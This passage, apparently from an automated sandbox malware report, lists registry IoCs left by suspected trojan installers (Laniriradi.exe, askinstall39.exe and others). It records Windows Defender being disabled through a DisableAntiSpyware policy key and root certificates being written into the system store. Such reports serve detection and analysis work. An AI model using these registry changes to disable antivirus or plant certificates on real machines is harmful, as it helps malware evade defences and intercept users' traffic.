Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e450000000000200000000001066000000010000200000005b3fac9d2629dd58e154c3e845570973228ec2909c1bdf4c105395f58363bd2a000000000e8000000002000020000000de55b77f22792bfd7f0dc4e451ff88e7d29a16be98f70869e4bdf66aff30ec4320000000e27cee6eb8a6cd7093b26b0bbf5cbb647548f99e79ae673212a1a8064ef520a6400000003d2ce446ba59cf012b8e78a9db4d4c18833178e554e0a4f4bf776e21b77b83d8a692a4b3c32b3e9a9bd002f7f38fed3a5cc36ca74f17cbaa9673571f2c017fab	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe

Modifies data under HKEY_USERS 23 IoCs

Processes:

rundll32.exemsiexec.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}User	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}User	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}USER	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine	rundll32.exe

Modifies registry class 24 IoCs

Processes:

msiexec.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Yonatan.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "2E72A6E77B6A70F46845C8932F3B3E32"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Laniriradi.exeinstaller.exeaskinstall39.exegpooe.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall39.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336